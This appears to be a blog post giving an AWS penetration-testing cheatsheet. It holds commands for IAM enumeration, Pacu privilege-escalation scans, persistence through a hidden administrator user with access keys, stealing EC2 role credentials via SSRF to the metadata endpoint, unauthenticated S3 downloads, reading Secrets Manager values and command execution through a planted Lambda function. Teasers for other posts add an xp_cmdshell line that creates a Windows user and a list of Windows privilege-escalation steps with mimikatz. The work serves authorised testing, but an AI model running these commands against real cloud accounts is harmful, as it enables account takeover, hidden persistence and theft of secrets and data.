Skip to main content

Cloud Pentest Cheatsheet- AWS CLI

By

 

Installation and Basic Commands
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install

#Login - Enter Client ID and Client_Secret
aws configure

#Login - Create a profile incase you have multiple accounts
aws configure --profile Some_NAME

#Get info about Access_key
aws sts get-caller-identity --profile Some_NAME

#Using Short Term Temp Creds
aws configure set aws_access_key_id [key-id] --profile ec2
aws configure set aws_secret_access_key [key-id] --profile ec2
aws configure set aws_session_token [token] --profile ec2
aws sts get-caller-identity --profile ec2

Exploitation using PACU
#Download and Install PACU
pip3 install -U pacu

#run pacu and create a session
pacu
0
AWS-Pentest

#Create AWS login Session - enter Access & Secret Key
set_keys

#Enum IAM permissions
exec iam__enum_permissions

#List all permission for the logged in user 
whoami

#Enum EC2 Instances
exec ec2__enum

#List all the gathered data
data EC2

#Auto PrivEsc 
exec iam__privesc_scan


Saved Credential Location 
#Windows - filename: credentials
c:\Users\Name\.aws/credentials

#Linux - filename: credentials
/home/username/.aws/credentials 
Important Things to Note 

  • If Access Key starts with AKI, it's a long-term credential
  • if Account Number is present in a policy, its Inline, Customer Created Policy
Enumeration - Users
#List Users
aws iam list-users 

#check if a given user is part of any groups
aws iam list-groups-for-user --user-name UserNameHere

#List AWS Managed Policies for a user
aws iam list-attached-user-policies --user-name UserNameHere

#List Inline Admin Created Policies for a user
aws iam list-user-policies --user-name UserNameHere
Enumeration - Groups & Policies
#List all Groups
aws iam list-groups

#List all users in a given group
aws iam get-group --group-name GroupNameHere

#List all manages policies that are attached to the specified IAM user
aws iam list-attached-user-policies --user-name [user-name]

#Lists the names of the inline policies embedded in the specified IAM user : 
aws iam list-user-policies --user-name [user-name]

#List All IAM Roles - Roles can only attached only to a AWS compute resource
aws iam list-roles 

#Lists all managed policies that are attached to the specified IAM role
aws iam list-attached-role-policies --role-name [ role-name]

#List the names of the inline policies embedded in the specified IAM role
aws iam list-role-policies --role-name [ role-name]

#List all Policies -Both inline and Managed Policies
aws iam list-policies 

#List Policies attached to a group
aws iam list-attached-group-policies --group-name <group-name>

#Retrieves information about the specified managed policy
#AttachmentCount = Number of Entities this policy is used in
aws iam get-policy --policy-arn [policy-arn]

#Lists information about the versions of the specified manages policy
aws iam list-policy-versions --policy-arn [policy-arn]

#Retrieved information about the specified version of the specified managed policy
aws iam get-policy-version --policy-arn policy-arn --version-id [version-id]

#Retrieves the specified inline policy document that is embedded on the specified IAM user / group / role 
aws iam get-user-policy --user-name [username] --policy-name [policy-name]
aws iam get-group-policy --group-name [group-name] --policy-name [policy-name]
aws iam get-role-policy --role-name [role-name] --policy-name [policy-name]
Simple Cheatsheet

#List your permissions - get ARN
aws sts get-caller-identity

#discover what else you can do, the IAM Policy Simulator is your best tool
aws iam simulate-principal-policy \
    --policy-source-arn <arn-of-lambdazen-user> \
    --action-names "ec2:DescribeInstances" "ec2:DescribeSubnets" "ec2:DescribeSecurityGroups"

#Check if you have any IAM permissions assigned to you 
aws iam simulate-principal-policy \
    --policy-source-arn <arn-of-lambdazen-user> \
    --action-names "iam:ListUsers" "iam:ListRoles" "iam:GetPolicy"

#List user policies
aws iam list-user-policies --user-name UserNameHere

#Check for Inline Policies 
aws iam get-user-policy --user-name lambdazen --policy-name <policy-name-from-previous-command>

#Check for Group Membership
aws iam list-groups-for-user --user-name lambdazen

#List the group's attached policies:
aws iam list-attached-group-policies --group-name <group-name>

#List the group's inline policies:
aws iam list-group-policies --group-name <group-name>

#Check for Resource-Based Policies
aws s3api get-bucket-policy --bucket <the-bucket-name-you-can-access>


Persistence 

# Create the new user
aws iam create-user --user-name <new-hidden-user>

# Attach the same AdministratorAccess policy
aws iam attach-user-policy --user-name <new-hidden-user> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Create a new access key for your hidden user. Save this output securely.
aws iam create-access-key --user-name <new-hidden-user>

#AWS Console Access
aws iam create-login-profile --user-name <user-name> --password "YourSuperSecureP@ssw0rd!" --password-reset-required

Enumeration - Instances & Other Services
#List all EC2 Instances in default region
#Lists Keypair name, Public/Private IP
#Try to access the Public Endpoints - try to exploit them 
#Check roles
aws ec2 describe-instances

#list only required details 
aws ec2 describe-instances \
  --filters "Name=instance-state-name,Values=running,stopped" \
  --query "Reservations[*].Instances[*].{Name: (Tags[?Key=='Name'].Value | [0]), Hostname: PrivateDnsName, Status: State.Name, PrivateIP: PrivateIpAddress, PublicIP: PublicIpAddress}" \
  --output table


#Example - retrieve EC2 Temp Creds if a Server is Public and is vuln to SSRF
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role

S3 Bucket

#OSINT Enum - Find S3 Buckets
cloud_enum -k Bucket_Company_Name

#list all buckets
aws s3 ls

#Download Unauthenticated S3 Bucket files
aws s3 ls s3://<bucket-name> --region us-east-2 --no-sign-request
aws s3 cp s3://<bucket-name> --region us-east-2 --no-sign-request

#List S3 Bucket Contents
aws s3 ls s3://Bucket_name

#Download a file from s3 bucket
aws s3 cp s3://Bucket_name/file/path /path/to/save/fil

#List the items in a given bucket excluding mp4 files
aws s3 ls s3://bucketname/ --recursive --summarize --exclude "*.mp4"

#Exclude a directory and list
aws s3 ls s3://bucketname/ --recursive --summarize \
  --exclude "archived-logs/*" \
  --exclude "temp-uploads/*" \
  --exclude "user-avatars/*"

#Download a bucket recursively excluding a directory 
aws s3 cp s3://bucketname/ . --recursive --exclude "archived-logs/*"

#Upload a file to s3 Bucket
aws s3 cp /path/to/upload/filename s3://Bucket_name/file/path 

#Delte a file on S3 Bucket
aws s3 rm s3://Bucket_name/file/path 
Cloudwatch 

#Get S3 Bucket size/metrics using Cloud watch
aws cloudwatch get-metric-statistics \
    --namespace AWS/S3 \
    --metric-name BucketSizeBytes \
    --dimensions Name=BucketName,Value=BucketNameHERE Name=StorageType,Value=StandardStorage \
    --start-time $(date -u -d '2 days ago' +'%Y-%m-%dT%H:%M:%SZ') \
    --end-time $(date -u +'%Y-%m-%dT%H:%M:%SZ') \
    --period 86400 \
    --statistics Average
Database Enumeration

#RDS
aws rds describe-db-instances

#DynamoDB
aws dynamodb list-tables

#Redshift Clusters
aws redshift describe-clusters

#DocumentDB Clusters
aws rds describe-db-clusters --filter Name=engine,Values=docdb

Secrets Manager & Key Vault

#List secrets
aws secretsmanager list-secrets

#List a specific Secret
aws secretsmanager get-secret-value --secret-id <secret-name-or-arn>


#List keys
aws kms list-keys

#List a given key
aws kms describe-key --key-id <key-id-or-alias-name>

#Check the Key Policy
aws kms get-key-policy --key-id <key-id> --policy-name default
Exploit if the User has Lambda Read/Write/Invoke Permissions

Action:
  - 'Lambda:CreateFunction'
  - 'Lambda:InvokeFunction'

#List existing functions 
aws lambda list-functions

#get an existing function
aws lambda get-function --function-name <Func_Name>

#create a file named lambda_function.py
wget https://gist.githubusercontent.com/Bhanunamikaze/bf121677e9ffa3b1d8bd09e90426a283/raw/b11d4942dac11ef6d00374f4b2acd2ebeafc0355/lambda_function.py

#zip the file 
zip function.zip lambda_function.py

#check if a given user is part of any groups
#take the rolename 
aws iam list-groups-for-user --user-name UserNameHere

#Create a Lambda Function
#add  --endpoint-url 'http://domain.local' if required
aws lambda create-function --function-name test3 \
  --runtime python3.8 \
  --role arn:aws:iam::000000000000:role/<RoleNameHere> \
  --handler lambda_function.lambda_handler \
  --zip-file fileb://function.zip

#Create a payload file - payload.json; update the command as required
{"cmd": "ls"}

#invoke the function
aws lambda invoke --function-name test3 --payload fileb://payload.json output.json && cat output.json

#output of the command execution is stored in output.json file



Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD En...
Post a Comment
Read more